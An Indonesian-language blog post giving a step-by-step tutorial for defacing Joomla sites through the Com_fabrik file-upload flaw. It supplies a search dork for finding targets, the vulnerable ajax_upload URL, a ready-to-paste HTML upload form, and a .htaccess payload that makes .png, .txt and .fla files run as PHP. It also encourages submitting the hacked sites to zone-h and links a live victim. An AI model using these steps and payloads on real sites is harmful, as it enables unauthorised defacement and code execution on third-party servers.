Deface Poc Com_fabrik Fresh 2022

 

Com_fabrik adalah salah satu metode lama yang secara instan bisa mengunggah script ke halaman utama

Kalian tau ngga gua masih bisa dapet yang fresh loh meski pake dork pasaran

Bagi kalian yang mau nyoba sekalian aku kasih tutorialnya

Silahkan dorking dengan inurl:/com_fabrik site:

Disini saya sudah dapet webnya

Setelah mendapatkan webnya kalian coba exploit menggunakan index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

Jika berhasil akan seperti

Setelelah itu kalian buat csrf copas script berikut :

<form method="POST" action="http://web kalan.com/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" enctype="multipart/form-data"><input type="file" name="file"><button>Hajarr</button></form>

<Font Color="green" Face="courier new"><font size="8">CSRF www.nts-7.net</h1><br><br>

Ganti "web kalian.com dengan web yang kalian temukan".

Setelah itu upload script kalian bisa langsung ektensi index.htm jika ingin ngindex atau set .htcsss

Karena disini saya set .htaccess maka silahkan buat file .htaccess terlebih dahulu dengan isi seperti berikut :

#Alternate default index page 

DirectoryIndex nts7.htm 

AddType application/x-httpd-php .png 

AddType application/x-httpd-php .txt 

AddType application/x-httpd-php .fla

nts7.htm bisa kalian ganti dengan nama script kalian

Dan ini :

AddType application/x-httpd-php .png 

AddType application/x-httpd-php .txt 

AddType application/x-httpd-php .fla

Terserah bisa kalian hapus atau tidak tapi disini saya biarkan aja.

Upload file .htaccessnya 

Klik hajar 

Dan jika berhasil

Setelah itu selesai

Silahkan akses indexnya

Taraa hekedbaime

Syukur syukur kalo fresh cui auto submit ke zone-h

Nih gua kasih live targetnya santai aja : http://www.zone-h.org/mirror/id/40225094

Udah gitu aja komen aja kalo ada yang pengen ditanyakan pasti gua bales kok

FathurID

Cuman gemar sama internet dan akhirnya keblablasan

Share this post